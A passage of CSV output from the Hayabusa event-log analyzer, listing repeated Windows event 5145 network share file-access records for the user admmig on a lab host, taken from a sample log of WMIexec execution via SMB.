Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.780 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
